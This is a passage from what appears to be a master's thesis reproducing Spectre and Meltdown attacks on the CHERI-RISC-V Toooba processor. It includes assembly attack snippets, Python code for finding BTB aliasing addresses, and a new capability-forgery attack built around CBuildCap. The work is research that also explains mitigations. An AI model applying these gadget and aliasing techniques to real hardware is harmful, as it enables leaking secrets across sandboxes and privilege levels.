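ACCESS_SIZE = 8           # cld loads a double word


def first_load_address(index: int) -> int:
    """Address used by `cld t2, 0(ca1)` after `slli` and `cincoffset`."""
    return SECRET_BASE + (index << 3)


def allowed_by_code(index: int) -> bool:
    """Software check: `bge a0, t0, end` skips the load unless index < t0."""
    return index < COMPARE_VALUE


def allowed_by_capability(address: int) -> bool:
    """Hardware check: the whole access must lie within the bounds of ca1."""
    return SECRET_BASE <= address and address + ACCESS_SIZE - 1 <= SECRET_TOP


attack_address = first_load_address(0x40)
first_forbidden_address = first_load_address(COMPARE_VALUE)

print(hex(attack_address))                    # 0x80001200
print(hex(first_forbidden_address))           # 0x80001100
print(allowed_by_code(0x40))                  # False
print(allowed_by_capability(attack_address))  # True
```

The last two lines show the gap the attack relies on: the software check rejects index 0x40, while the bounds of ca1 in this configuration still cover the resulting address.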

This attack is classed as (✓/✗) as its success depends on the configuration of the capability used for the first load. In both cases the code forbids the first memory access, but the capability configuration differs between the two instances of Spectre-PHT. If the capability is configured such that the memory access is out of capability bounds, the attack will not work. Otherwise, the attack will work. For the explanation of why the capability configuration mitigates the attack, see Section 5.2.1.

The important factor in this attack is the miss penalty of the load through ca2. If this load, which misses all caches, returns before the second load has been issued, the attack will not be successful: Toooba will detect the misprediction and not issue the second load, and thus the attacker cannot detect the timing difference through the cache later. In my simulation, the load took 61 cycles from leaving the core until the value returned. The first speculative load is issued one cycle later and the second speculative load seven cycles after the first load. Therefore, Spectre-PHT works as 53 cycles are left. This means that an attacker can effectively use the spare cycles for executing other transient instructions that reveal more complex internal state, e.g., shifting and adding register values and then performing a load dependent on this data.
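The cycle budget stated above is simple subtraction. The following sketch makes it explicit, using the cycle counts from my simulation. The helper name spare_cycles is an illustrative assumption.

```python
# Cycle budget of the transient window; the numbers are the simulation
# results quoted in the text, the helper name is illustrative.

MISS_PENALTY_CYCLES = 61     # load through ca2: from leaving the core to return
FIRST_LOAD_ISSUE_DELAY = 1   # first speculative load is issued one cycle later
SECOND_LOAD_ISSUE_DELAY = 7  # second speculative load follows seven cycles later


def spare_cycles(miss_penalty: int, *issue_delays: int) -> int:
    """Cycles left in the transient window after the last load was issued."""
    return miss_penalty - sum(issue_delays)


slack = spare_cycles(
    MISS_PENALTY_CYCLES, FIRST_LOAD_ISSUE_DELAY, SECOND_LOAD_ISSUE_DELAY
)
print(slack)  # 53
```

A non-positive result would mean that the branch resolves before the revealing load is issued, in which case the attack fails.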

5.1.2 Spectre-PHT-CHERI-Write

When code is using capabilities in Toooba, this attack is successfully mitigated by CHERI. In my example, the attacker writes a double word to memory, which effectively clears the tag bit of the capability stored at this address as the stored data is not a capability itself. Therefore, when the return address is loaded, an invalid code capability is placed in the return address register. Toooba cannot jump to this capability and therefore this specific attack is successfully mitigated. Furthermore, a suitable capability configuration, which enforces tight bounds, mitigates this specific attack and variants of it in the first place as described in Section 4.2.1.

5.1.3 Spectre-BTB on CHERI-Sandboxes

Sandboxes are designed to have strong memory protection against each other. One sandbox is not allowed to leak secrets to another sandbox. Inspired by Jonathan Woodruff and Jessica Clarke, I created an example that allows an adversary sandbox to leak information from another sandbox. Software compartmentalisation is one of the main goals of CHERI; this attack has specifically been designed to circumvent compartmentalisation and leak secrets of a victim sandbox. This example contains two sandboxes. One of them is an adversary sandbox, the other one is benign. The benign sandbox is referred to as sand1, whereas the attacker sandbox is called attackbox.

    sand1_code:
    // load capability to jump to
    clc ct1, 16(ct6)
    // load pcc into cs7
    auipcc cs7, 0
    // this jump is aliased in the BTB
    cjr ct1

Figure 5.2: Code snippet of victim code in a sandbox which is under attack.

The code of sand1, which is the victim sandbox being attacked by attackbox, is depicted in Figure 5.2. The first instruction in the code of sand1 loads a capability from memory and the last instruction jumps to it. The second instruction, auipcc, adds the second operand, shifted left by 12 bits, to the current PCC. Since the second operand is zero in this example, auipcc writes the current PCC to cs7. This is a common way to produce capabilities for accessing data in CHERI-RISC-V and is regularly used by CHERI-LLVM.

Attacking Toooba’s BTB

The goal of the attack is to trick Toooba into speculatively jumping from the benign sandbox sand1 into the attacker sandbox attackbox. Speculation for indirect jumps (jumps like cjr ct1) is done with the help of the BTB. To fully understand the design of the attack, I need to explain Toooba’s BTB and the hashing function I added. The BTB is an indexed array with 256 entries of the form depicted in Figure 5.3. An entry has three fields: one valid bit, an 8-bit tag, and the destination PCC target. When a jump is taken, a BTB entry is updated. The index of this entry is determined by PCCj[8:1], where PCCj is the PCC of the jump instruction. PCCj[X:Y] denotes a selection of bits X down to Y from PCCj, where index 0 is the Least Significant Bit (LSB) and index bitfield.length − 1 is the Most Significant Bit (MSB) of a bit field. The tag is calculated by splitting the address of PCCj into bytes and XOR-ing all eight bytes. The target PCC is the PCC to be executed in case the jump is taken. If a BTB entry is updated, its valid bit is set. The valid bit of each entry is zero at start-up or if cleared by hardware, e.g., if branch prediction state flushing is implemented as described in Section 2.3.2. When a branch prediction from the BTB is required, the index and the tag for that PCC are calculated. Only if the valid bit at that index is set and the calculated tag equals the tag stored at that index is this deemed a valid branch prediction, and Toooba will speculate to the target PCC of this entry.

    | V (1 bit) | Tag (8 bits) | Target (129 bits) |

Figure 5.3: Fields of an entry in Toooba’s BTB.
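The update and lookup rules described above can be summarised in a small behavioural model. This is a sketch in Python and not Toooba’s Bluespec implementation. The class and function names are assumptions, PCCs are reduced to their 64-bit address, and the addresses in the usage lines are hypothetical.

```python
from dataclasses import dataclass
from typing import List, Optional

BTB_ENTRIES = 256


def btb_index(address: int) -> int:
    """Bits [8:1] of the address of the jump instruction."""
    return (address >> 1) & 0xFF


def btb_tag(address: int) -> int:
    """XOR of the eight bytes of the 64-bit address."""
    tag = 0
    for byte in address.to_bytes(8, "little"):
        tag ^= byte
    return tag


@dataclass
class BtbEntry:
    valid: bool = False
    tag: int = 0
    target: int = 0


class Btb:
    def __init__(self) -> None:
        # All valid bits are zero at start-up.
        self.entries: List[BtbEntry] = [BtbEntry() for _ in range(BTB_ENTRIES)]

    def update(self, jump_address: int, target: int) -> None:
        """Called when a jump is taken: overwrite the indexed entry."""
        entry = BtbEntry(True, btb_tag(jump_address), target)
        self.entries[btb_index(jump_address)] = entry

    def predict(self, jump_address: int) -> Optional[int]:
        """Return a target only if the entry is valid and the tags match."""
        entry = self.entries[btb_index(jump_address)]
        if entry.valid and entry.tag == btb_tag(jump_address):
            return entry.target
        return None


btb = Btb()
btb.update(0x80000100, 0x80000400)  # hypothetical jump and target
print(btb.predict(0x80000100))      # 2147484672, i.e. 0x80000400
print(btb.predict(0x80010100))      # None: same index, different tag
```

The second lookup shares the index 0x80 with the first but XORs to a different tag, so the model reports no prediction. This is the case the attacker has to avoid when aliasing an entry.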

The attacker wants to place an entry into the BTB so that the jump in Figure 5.2 speculatively leads to execution of attacker-chosen code the next time the victim sandbox sand1 executes. For this attack, I assume that the attacker can freely choose the address where their code is placed in the address space. In order to alias a BTB entry, an attacker needs to place a jump instruction at an address so that the following requirements are fulfilled, where PCCb is the PCC of the jump in the victim sandbox, PCCa is the PCC of the jump in the attacker sandbox, addr() is the function that extracts the address of its argument PCC, and tag() is the function that calculates the tag by XOR-ing the bytes of the respective address:

    PCCb[8:1] = PCCa[8:1]                      (5.1)
    tag(addr(PCCb)) = tag(addr(PCCa))          (5.2)

Mapping the attacker jump instruction to the same index in the BTB is an easy task for an attacker. The more interesting task is to align the PCC of the attacker jump instruction so that its tag value equals the tag of the victim sandbox PCC. The sandbox to be attacked, sand1, has a PCC with the start address 0x80020000 and the length 0x2000. The jump instruction cjr ct1 is at the PCC 0xffff200000018005_0000000080020244. This is the entire 128-bit code capability. As depicted in Figure 2.5, the upper 64 bits contain the otype, the permissions, and the compressed bounds, whereas the lower 64 bits contain the actual address. The address is important in this attack scenario and is therefore separated by an underscore character from the rest of the capability. I did not include the tag bit for capabilities in the description in this subsection; all capabilities need to have valid tag bits in order to be used for jumping and dereferencing memory. I chose the attacker sandbox attackbox to start at the address 0x80040000 and have a length of 0x20000. I decided to choose 0xffff20000001a001_0000000080040444 as the PCC for the jump. With that I wanted to demonstrate that it is possible to conduct the attack in a single address-space operating system and that victim and attacker sandbox do not need to have the same bounds:

    PCCb = 0xffff200000018005_0000000080020244          (5.3)
    PCCa = 0xffff20000001a001_0000000080040444          (5.4)
    tag(addr(PCCb)) = tag(addr(PCCa)) = 0xc4            (5.5)
    PCCb[8:1] = PCCa[8:1] = 0x22                        (5.6)
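Requirements (5.1) and (5.2) can be turned into a brute-force search over the attacker sandbox. The sketch below is a Python illustration and not part of the attack code. The function names and the assumed 2-byte instruction alignment are assumptions, while the addresses and bounds are those given in the text.

```python
# Search the attacker sandbox for jump addresses that alias the victim's
# BTB entry, i.e. that satisfy requirements (5.1) and (5.2).

def btb_index(address: int) -> int:
    """Bits [8:1] of the address of the jump instruction."""
    return (address >> 1) & 0xFF


def btb_tag(address: int) -> int:
    """XOR of the eight bytes of the 64-bit address."""
    tag = 0
    for shift in range(0, 64, 8):
        tag ^= (address >> shift) & 0xFF
    return tag


def find_aliases(victim_jump: int, base: int, length: int, alignment: int = 2):
    """All aligned addresses in [base, base + length) with equal index and tag."""
    wanted = (btb_index(victim_jump), btb_tag(victim_jump))
    return [
        address
        for address in range(base, base + length, alignment)
        if (btb_index(address), btb_tag(address)) == wanted
    ]


VICTIM_JUMP = 0x80020244     # addr(PCCb)
ATTACKBOX_BASE = 0x80040000  # start address of attackbox
ATTACKBOX_LENGTH = 0x20000   # length of attackbox

aliases = find_aliases(VICTIM_JUMP, ATTACKBOX_BASE, ATTACKBOX_LENGTH)
print(hex(btb_index(VICTIM_JUMP)), hex(btb_tag(VICTIM_JUMP)))  # 0x22 0xc4
print([hex(address) for address in aliases])                   # ['0x80040444']
```

Under these assumptions the search returns exactly one candidate inside attackbox, the address used in equation (5.4).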

Conducting the Attack

Now that we have understood how to alias an entry in the BTB, the most important part of the attack is done. The next step for the attacker is to actually place an entry at the respective index; this can be considered the training phase of the BTB. To achieve this, the attacker runs its code, including the jump at PCCa, which branches to an attacker-chosen target. This target is the gadget the victim sandbox will speculatively jump to during the actual attack. Suitable targets are explained in the following paragraphs. The second training step is to ensure that the first instruction in Figure 5.2 misses all caches so that the misspeculation lasts as long as possible. If this were not the case, Toooba would quickly load the correct PCC to jump to and correct its misspeculation before the transient-execution sequence in the target gadget could take effect. After this training phase, the attacker triggers or awaits the next execution of sand1. The load will miss all caches and Toooba will speculatively jump to the attacker’s gadget with the entire register state of sand1 being present.

The attacker can use the register state from sand1 in multiple ways to achieve different goals of their attack. First, the attacker can leak one or more secret values stored in a register. This can be the case if sand1 computes on secret data, e.g., an encryption key. In order to reveal the secret, the attacker performs a load to an attacker-accessible array indexed by the secret. Second, the register state can give the attacker access to a memory location of interest, e.g., because only sand1 has a capability to this memory location. The attacker loads the value of interest and conducts a second load to an attacker-accessible array indexed by that value in order to reveal it. Furthermore, it is possible to load other capabilities through capabilities being present in the current register state of the victim. In my example of the attack, I used the second method. The load missing all caches needs 88 cycles from being issued to memory until returning to the core. The first speculative memory access in the gadget, which fetches the secret into the core, is issued with 20 cycles left and the revealing load with 12 cycles left, which explains why the attack is successful.

This sandbox attack includes the basic Spectre-BTB attack as demonstrated in [22]. The pure Spectre-BTB attack has also been reproduced in this thesis work, but is not shown since its mechanism is included in this attack. Furthermore, I produced other Spectre-BTB attacks, e.g., attacks on direct jumps and similar variants. However, these were either not successful or did not attack Toooba in a way not already explained. Therefore, I do not explain these attacks in this text.

5.1.4 Priv-Mode Attacks

The sandbox attacks raise the question whether it is possible to speculate across different privilege modes in RISC-V. I constructed two attacks confirming the hypothesis that it is possible, which are referred to as Priv-Mode-Regs and Priv-Mode-Exec in Table 5.1. For both attacks, the scenario is that privileged code, e.g., kernel code, is being executed in S privilege mode, whereas the attacker code resides in U privilege mode. The goal of both attacks is to speculatively jump to the gadget chosen by the attacker. This scenario can be found in real-world attacks as well, as operating systems usually run in S privilege mode in RISC-V [12]. A real-world attack for this scenario is further explained in Section 6.1.4. None of the priv-mode attacks is possible if the Supervisor User Memory (SUM) bit is cleared in sstatus. This mechanism prevents code running in S mode from accessing pages that are accessible by U mode code¹. The SUM mechanism and related principles are thoroughly explained in the privileged specification [12].

Priv-Mode-Regs

This attack is close to the sandbox attack presented in Section 5.1.3. The goal of this attack is to speculatively jump from S privilege mode to U privilege mode in order to use the register state set up by the S mode code. The two main parts of the attack are again aliasing an entry in the BTB and delaying a load such that a jump depending on that load speculatively leads to the execution of the attacker’s chosen gadget residing in U mode. As in the sandbox attack, the goal of the attacker is to make use of the register state of the S mode code by leaking a value either from or through the register state. I constructed an attack that manages to leak a value through a powerful capability of the kernel being present in the current register state. Other particularly interesting targets are Special Capability Registers (SCRs) as they are expected to hold powerful capabilities.

¹ Code pages accessible by U privilege mode code have the U(ser) bit set in the respective PTE.

Priv-Mode-Exec

The difference between this attack and the Priv-Mode-Regs attack is that the attacker-chosen gadget makes use of the fact that the processor continues to execute in S privilege mode during speculation. This means that the attacker has permission to access CSRs. In my example, the gadget accesses sscratch, which has previously been written to by the kernel, and then performs a load to an attacker-accessible array indexed by the value in sscratch. This attack requires the PCC in U privilege mode to have its Access System Registers (ASR) permission set, as ASR restricts access to both CSRs and SCRs. RISC-V constrains the access to CSRs by privilege modes, but CHERI-RISC-V adds the ASR functionality on top. ASR restricts access to all CSRs except seven white-listed ones, which do not include sscratch [37]. This attack demonstrates how to make use of the register values accessible to the code the speculative jump came from.

For this attack, it is important to understand that the privilege mode a RISC-V microprocessor currently operates in is internal state and can only be changed by traps and their respective return operations. Furthermore, this means that code can be executed in every privilege mode as long as it does not contain privilege-mode-specific instructions, such as mret, which can only be used in M privilege mode. An mret instruction executed in S or U privilege mode leads to an exception being raised. In my example, the revealing gadget is executed in both S and U privilege mode.

5.1.5 Spectre-RSB

Similar to the BTB, the RSB can contain powerful capabilities that can be of use for an attacker. The code depicted in Figure 5.4 shows an example of privileged code that is called from user space. First, the code loads a new address into the return address register cra. Next, the code loads its PCC into a register, adds an offset to the capability address and stores a secret value to this memory location. Finally, the code returns to the address previously loaded into cra. However, Toooba will predict the return address and use the top entry of the RSB for the prediction. This entry is a capability pointing to the next instruction of the calling function. The RSB contains this entry because the call to the privileged function caused the hardware to push it there. Therefore, Toooba will speculatively jump to unprivileged code with the register state of the privileged code. In fact, Toooba will always speculatively jump to the next instruction of the calling code in the example depicted in Figure 5.4. Later, Toooba will jump to the actual PCC when it realises its misspeculation. Spectre-RSB gives the attacker the same possibilities to make use of the register state of the privileged code as Spectre-BTB does. I created an example that uses a powerful capability in the speculative register state in order to pull a secret into the core and make it visible to the attacker via a second load.

    kernel_funct:
    // load new return address
    clc cra, 0(cs2)
    // load kernel pcc into ct6
    auipcc ct6, 0
    li t1, 0x200
    cincoffset ct6, ct6, t1
    li t1, 0x400
    // store secret
    csd t1, 0(ct6)
    // return
    cret

Figure 5.4: Privileged code whose return address will be mispredicted in the Spectre-RSB attack.

What this attack needs is a mismatch between the software return address and the address stored in the RSB. In my example, this is achieved by loading another address into cra. For the attack to work, I made this load miss all caches. This gives attackers the biggest possible time window to transiently perform other loads that make the secret visible. As described in Section 4.1.4, overflowing the RSB can also create a mismatch between hardware and software return addresses. I successfully conducted this attack type in CHERI-RISC-V assembly as well. Note that, as explained previously, this only works if the capabilities allow these memory accesses.
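The mismatch between hardware and software return address can be illustrated with a toy model of a return stack. This is a Python sketch under simplifying assumptions: the class name and both addresses are hypothetical, and the model ignores the depth and overflow behaviour of Toooba’s RSB.

```python
# Toy model of an RSB misprediction. All names and addresses are hypothetical.

class ReturnStackBuffer:
    def __init__(self) -> None:
        self._stack = []

    def push(self, return_address: int) -> None:
        """A call pushes the address of the instruction following it."""
        self._stack.append(return_address)

    def predict(self):
        """A return pops the top entry and uses it as the predicted target."""
        return self._stack.pop() if self._stack else None


CALLER_NEXT_INSTRUCTION = 0x80000104  # user code after the call (hypothetical)
NEW_RETURN_ADDRESS = 0x80008000       # loaded by `clc cra, 0(cs2)` (hypothetical)

rsb = ReturnStackBuffer()
rsb.push(CALLER_NEXT_INSTRUCTION)     # user space calls kernel_funct
software_return = NEW_RETURN_ADDRESS  # kernel_funct overwrites cra
predicted_return = rsb.predict()      # cret is predicted from the RSB

print(hex(predicted_return))                # 0x80000104
print(predicted_return != software_return)  # True: transient window opens
```

While the load into cra is outstanding, execution would continue at the predicted address, which is the situation the attack exploits.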

    clc ca1, 0(cs1)
    // ca1 and cs2 hold the same capability
    csd a4, 0(ca1)
    // memory disambiguation will lead to
    // this being executed with stale data
    cld a2, 0(cs2)
    cincoffset cs3, cs3, a2
    cld a3, 0(cs3)

Figure 5.5: Reproduction of the Spectre-STL attack in CHERI-RISC-V assembly.

5.1.6 Spectre-STL

Spectre-STL-Load and Spectre-STL-Jump both rely on the fact that memory disambiguation predicts a store-load pair to be independent although they access the same memory address. As shown in Table 5.1, both Spectre-STL variants work in CHERI-RISC-V Toooba.

Spectre-STL-Load

The code depicted in Figure 5.5 shows the sequence of instructions that constitutes the actual attack. The first instruction loads the capability at the address pointed to by cs1 into ca1. I constructed the attack such that cs2 is stored at this memory address. In my example, ca1 and cs2 are identical capabilities, but for the attack to be successful they only need to point to the same memory address. The following store and load instructions are executed out of order under the assumption that they are independent, since they use different capability registers for memory accesses. However, this is not the case as both the store and the load go to the same memory address. The load is executed earlier than the store and therefore does not return the data of the store, but the previous content stored at this memory address. The transient-instruction sequence following the load of the stale data reveals the secret data: issuing a load, indexed by the secret, to an attacker-accessible array with its base address stored in cs3 makes the secret visible to the attacker.

Toooba’s memory disambiguation and out-of-order execution enable this attack. When memory instructions reach the Rename stage, one instruction per cycle is enqueued to the memory reservation station, from which the memory pipeline pulls its instructions. The memory pipeline executes the instructions as soon as all source register values are available. Toooba does not have a dedicated unit for disambiguating memory accesses; it assumes that memory accesses through different registers are not dependent. In case they are, Toooba performs a rollback and re-executes the affected instructions. In my example, the first load introduces a delay for the second instruction as they overlap in architectural register use. The second instruction cannot proceed in the memory pipeline. However, the third instruction can proceed in the memory pipeline and produce its result as it does not overlap in architectural register use. This leads to the transient-instruction sequence being executed with stale memory data.
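The effect of the load overtaking the store can be shown with a minimal memory model. This is a Python sketch and not a model of Toooba’s pipeline. The addresses, the stale value, and the function name are hypothetical.

```python
# Minimal model of a load that bypasses an older store to the same address.
# Addresses and values are hypothetical.

SHARED_ADDRESS = 0x80002000  # address that both ca1 and cs2 point to
PROBE_BASE = 0x80003000      # base of the attacker-accessible array (cs3)


def loaded_value(memory: dict, store_value: int, load_bypasses_store: bool) -> int:
    """Value seen by `cld a2, 0(cs2)` for the given execution order."""
    mem = dict(memory)
    if load_bypasses_store:
        value = mem[SHARED_ADDRESS]        # load executes first: stale data
        mem[SHARED_ADDRESS] = store_value  # store executes afterwards
    else:
        mem[SHARED_ADDRESS] = store_value  # program order: store first
        value = mem[SHARED_ADDRESS]
    return value


memory = {SHARED_ADDRESS: 0x180}  # stale secret still in memory
transient = loaded_value(memory, store_value=0x0, load_bypasses_store=True)
architectural = loaded_value(memory, store_value=0x0, load_bypasses_store=False)

print(hex(transient), hex(architectural))  # 0x180 0x0
print(hex(PROBE_BASE + transient))         # 0x80003180: line touched transiently
```

After the rollback only the architectural value remains visible in registers, but the probe-array line selected by the stale value has already been brought into the cache.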

Spectre-STL-Jump

The setup for this attack is similar to the attack on RISC-V Toooba presented in Section 4.1.5, with the difference that capabilities are used instead of integer pointers. The fact that the stale value being loaded is not data but a valid code capability does not change the feasibility of this attack. The code capability is valid and therefore Toooba takes the indirect branch to this capability’s address. Analogously to Spectre-STL-Load, the memory accesses are not out of bounds and hence CHERI does not prevent this sequence of speculative instructions. The attack works because Toooba generally assumes memory operations not to be dependent, as described above.

5.2 Meltdown Attacks

Table 5.3 shows an overview of the Meltdown attacks reproduced on CHERI-RISC-V Toooba during this thesis work and whether they were successful. As with the Spectre attacks, some attacks are very similar and therefore the common attack techniques are explained only once.

5.2.1 Meltdown-US-CHERI

Meltdown-US-CHERI is an adaptation of Meltdown-US. Instead of attempting to read from a page that the attacker does not have sufficient rights to access, I attempted to read from a memory address through a capability out of its bounds. This attack is especially tailored to CHERI; the results of the reproduction of the original Meltdown-US attack are presented in Section 4.2.1.

                          CHERI asm
    Meltdown-US-CHERI     ✗
    Meltdown-GP-CHERI     ✗
    CBuildCap-Load        ✓
    CSetBounds-Load       ✓
    CInvoke-Load          ✓
    CUnseal-Load          ✓

Table 5.3: Overview of attempted Meltdown-style attacks on CHERI-RISC-V Toooba and whether they were successful.

The code for the attack is shown in Figure 5.6. The attack consists of three basic parts. First, the attacker increases the offset to a desired address out of capability bounds. Note that in CHERI, setting the address out of bounds is not an illegal operation in itself, but the memory access through such a capability is. This memory access, performed by the second instruction, is the next part of the attack. It loads the desired secret into the register t2. The following two instructions are the final part of the attack and reveal the secret by a load to an attacker-accessible array with its base address in ct1.
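The distinction between moving a capability’s address and dereferencing it can be sketched as follows. This is a simplified Python model: it ignores tags, permissions, and the representability limits of compressed bounds. The class names and the concrete bounds of ct0 are assumptions.

```python
from dataclasses import dataclass, replace


class CapabilityBoundsError(Exception):
    """Raised when a memory access falls outside the capability bounds."""


@dataclass(frozen=True)
class Capability:
    base: int     # lowest accessible address
    top: int      # first address past the accessible region
    address: int  # current address (base plus offset)

    def inc_offset(self, delta: int) -> "Capability":
        """Models cincoffset: moving the address is always allowed here."""
        return replace(self, address=self.address + delta)

    def check_load(self, size: int = 8) -> None:
        """Models the bounds check performed on a `size`-byte load."""
        if self.address < self.base or self.address + size > self.top:
            raise CapabilityBoundsError(hex(self.address))


# Hypothetical bounds for ct0; Figure 5.6 only fixes the increment of 512.
ct0 = Capability(base=0x80001000, top=0x80001100, address=0x80001000)
out_of_bounds = ct0.inc_offset(512)  # legal: only the address changes

ct0.check_load()                     # in bounds: no exception
try:
    out_of_bounds.check_load()
    load_issued = True
except CapabilityBoundsError:
    load_issued = False

print(hex(out_of_bounds.address), load_issued)  # 0x80001200 False
```

In this model the increment succeeds and only the load is rejected, which mirrors the first two instructions of the attack.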

However, this attack could not be conducted successfully in CHERI-RISC-V Toooba. Its memory pipeline consists of multiple stages that dispatch the instruction, read the register values, calculate the virtual address, translate the virtual address to the physical address, and finally enqueue the memory access into the LSQ. The last two pipeline stages are depicted in Figure 4.2. In the last pipeline stage, Toooba performs the capability bounds checks and sets the exception cause field in the corresponding LSQ entry in case an exception is detected. Toooba only issues valid requests, i.e., those without the cause field set, to memory. Therefore, the out-of-bounds load is never issued, which effectively mitigates the entire attack. No revealing transient-execution sequence is possible because the necessary result never becomes available.

    melt_us_cheri:
    // set ct0 offset out of bounds
    cincoffsetimm ct0, ct0, 512
    // perform load out of capability bounds
    cld t2, 0(ct0)
    // load again from another capability with offset
    cincoffset ct1, ct1, t2
    cld t2, 0(ct1)

Figure 5.6: Reproduction of the Meltdown-US attack tailored to CHERI capabilities.

5.2.2 Meltdown-GP-CHERI

The Meltdown-GP attack, presented in Section 4.2.2, and the Meltdown-GP-CHERI attack are very similar. Both attacks seek to read a register that the code has no permission to read. In my Meltdown-GP-CHERI example, the attacker wants to access the SCR mscratchc, which cannot be accessed if the current PCC does not have the ASR bit set, which is the case in my setup for this attack. The access is followed by a load to an attacker-accessible array in order to make the secret visible. Meltdown-GP-CHERI is therefore a variant of Meltdown-GP tailored to CHERI systems, as they offer the ASR functionality in addition to what conventional RISC-V systems provide. However, as marked in Table 5.3, this attack is not possible on CHERI-RISC-V Toooba. Similar to the description of Meltdown-GP in Section 4.2.2, checking whether the ASR bit is set is done as part of the Rename stage in Toooba. This leads to the instruction being marked as executed in the ROB entry, which means that it never enters the ALU pipeline. Therefore, the result is never produced, which mitigates the attack as the following transient-instruction sequence cannot reveal the secret register value.

5.2.3 Meltdown-CF

Meltdown-CF (Capability Forgery) is a new subclass of transient-execution attacks that was developed in this master’s thesis work. The goal of all attacks in this subclass is the same: speculatively forging a capability to memory that the attacker should not have access to, and using it to leak secrets. Therefore, Meltdown-CF attacks pose a large threat to CHERI systems. All attacks in the Meltdown-CF class are inspired by Jonathan Woodruff and members of the CHERI team, who suspected a vulnerability in CHERI-RISC-V Toooba and encouraged me to attempt these exploits.

CBuildCap

The CBuildCap instruction has been added to CHERI-RISC-V in order to increase performance when importing capabilities. CBuildCap attempts to build a capability from a bit pattern. This instruction has three operands: the bit pattern stored in a capability register, an authorising capability stored in another capability register, and the destination capability register. The bit pattern does not need to be tagged, but it must not constitute an escalation of privileges over the authorising capability. If this invariant is broken, an exception is raised [37]. The CBuildCap instruction can be logically split into two sub-operations. First, the capability checks have to be conducted. Second, if the capability checks were successful, the input capability bit pattern is tagged, and thereby becomes a valid capability, and is written to the destination register.

The main part of the attack code is depicted in Figure 5.7. This code is expected to run in an attacker-controlled compartment whose PCC is limited to certain addresses. In this scenario, the attacker can be a user that now acts as an adversary on a CHERI system. The goal of the attacker is to speculatively craft a powerful capability in order to read secrets of other compartments. The register a0 holds the index to be used to access the speculatively created capability and ca1 holds the bit pattern to be used with CBuildCap. The index is shifted logically left by four bits in order to address 16-byte memory chunks. The attack is designed such that the load following the shift instruction misses all caches and therefore produces the maximum load penalty possible. The CBuildCap instruction is not dependent on the previous instructions and can be executed out of order before the load finishes. In fact, none of the instructions following the load depend on it. Therefore, all of these instructions can be executed before the slow load finishes, but none of them can commit before the load commits.

The CBuildCap instruction has cs1 as authorising capability, which is

derived from DDC, but limited to the addresses [0x80001000−0x80002000],

which in my example is the most powerful data capability the attacker has

access to. The bit pattern passed in ca1 is the almighty capability spanning

the entire address space with the tag bit stripped. However, this breaks the

invariant that the authorising capability must be at least as powerful as

the bit pattern. The CBuildCap instruction will fail, but for now we assume

that it does not and that all subsequent instructions will be executed normally.

Next, the attack uses the index calculated before and adds it to the capability

address. This is the address of the secret value, which is loaded in the next

instruction. This secret value is used as an index to a user accessible array,

access_funct:

// a0: index to 16 byte chunks

// ca1: bit pattern for capability to be built

slli a0, a0, 4

// misses all caches and produces

// maximum miss penalty

cld t1, 0(cs1)

// will raise an exception, but before

// that it will reveal the secret

cbuildcap ct2, cs1, ca1

cincoffset ct2, ct2, a0

// load twice to reveal secret

cld t0, 0(ct2)

cincoffset cs7, cs7, t0

cld t0, 0(cs7)

cret

Figure 5.7: Overview of the CBuildCap attack code.

which cs7 is the base address of. The load to this address reveals the secret

to the attacker as they can probe the user accessible array later in order to find

out the secret value.
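
The transmit and recover steps of this cache side channel can be modelled in a few lines of Python. The sketch is not the measurement code used in this work: `ToyCache`, the 64-byte line size, and the scaling of the secret to one cache line per value are assumptions made for illustration (Figure 5.7 adds the loaded value to cs7 directly).

```python
LINE = 64  # assumed cache-line size in bytes

class ToyCache:
    """Tracks which lines are present; a hit stands in for a fast access."""
    def __init__(self):
        self.lines = set()

    def flush(self):
        self.lines.clear()

    def access(self, addr):
        """Touch addr and report whether it was already cached."""
        line = addr // LINE
        hit = line in self.lines
        self.lines.add(line)
        return hit

def transient_leak(cache, probe_base, secret):
    # Second transient load: the accessed address depends on the secret.
    cache.access(probe_base + secret * LINE)

def recover(cache, probe_base, candidates=256):
    # Probe every candidate line; only the transiently touched one hits.
    return [v for v in range(candidates) if cache.access(probe_base + v * LINE)]

cache = ToyCache()
cache.flush()
transient_leak(cache, probe_base=0x80001000, secret=0x2A)
print(recover(cache, probe_base=0x80001000))  # [42]
```

In a real attack the hit is inferred from access latency rather than read from a set, so the recovery step is noisy and usually repeated.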

Toooba’s ALU has four pipeline stages: Dispatching the instruction to

the ALU, reading the register values, doing the actual operation, and writing

back the calculated value. Toooba reverses the order of the sub-operations for

CBuildCap in order to improve performance. It first tags the input data and

then performs the capability checks, which are called CapMod and CapCheck

in Figure 5.8. This means that there exists a tagged capability that has not

been checked yet in the actual executing stage. In the next stage, the writeback

stage called FinishALU in Figure 5.8, Toooba performs the actual checks and

finishes the execution of CBuildCap by marking it as executed in the ROB.

This will also set a field in the ROB that this instruction created an exception.

In order to improve performance Toooba uses forwarding of ALU results to

subsequent operations. In general, forwarding avoids stall cycles that would be

introduced by writing the result to the register file and other operations having

to wait to read this value. Toooba uses forwarding in both the ExeALU and the

FinishALU stage as well as writing the data to the register file in the FinishALU

stage. For my attack, this means that the powerful tagged capability will be

[Figure 5.8 (diagram). Labels: Register File; ExeALU (CapMod); speculative capability values; FinishALU (CapCheck); trap code; Reorder Buffer.]

Figure 5.8: The last two stages of the Toooba ALU pipeline which forwards

modified capabilities before performing capability checks. [Footnote 2]

forwarded to subsequent instructions which use the result of the CBuildCap

instruction.
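
The effect of tagging and forwarding before checking can be illustrated with a toy Python model of the two stages. It is a sketch under strong simplifications: capabilities are plain dictionaries, `touched` stands in for microarchitectural side effects such as cache fills, and none of the names correspond to Toooba's source code.

```python
def within(pattern, auth):
    """Bounds-only subset check (permissions are ignored in this sketch)."""
    return auth["base"] <= pattern["base"] and pattern["top"] <= auth["top"]

def run_cbuildcap(auth, pattern, memory, secret_addr):
    touched = []  # side effects that survive a squash
    # ExeALU / CapMod: tag the pattern and forward it before any check.
    forwarded = dict(pattern, tag=True)
    # A dependent transient load consumes the forwarded capability.
    if forwarded["tag"] and forwarded["base"] <= secret_addr < forwarded["top"]:
        touched.append(memory[secret_addr])
    # FinishALU / CapCheck: the outcome is recorded in the ROB as a trap.
    trap = not within(pattern, auth)
    # Commit: the architectural result is dropped on a trap, side effects are not.
    committed = None if trap else forwarded
    return committed, trap, touched

auth = {"base": 0x80001000, "top": 0x80002000, "tag": True}
almighty = {"base": 0, "top": 1 << 64, "tag": False}
print(run_cbuildcap(auth, almighty, {0x90000000: 0x2A}, 0x90000000))
# (None, True, [42])
```

The returned tuple shows the core of the problem: nothing is committed and the trap is recorded, yet the secret has already been consumed by a dependent operation.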

An instruction commits when it reaches the head of the ROB. Toooba raises

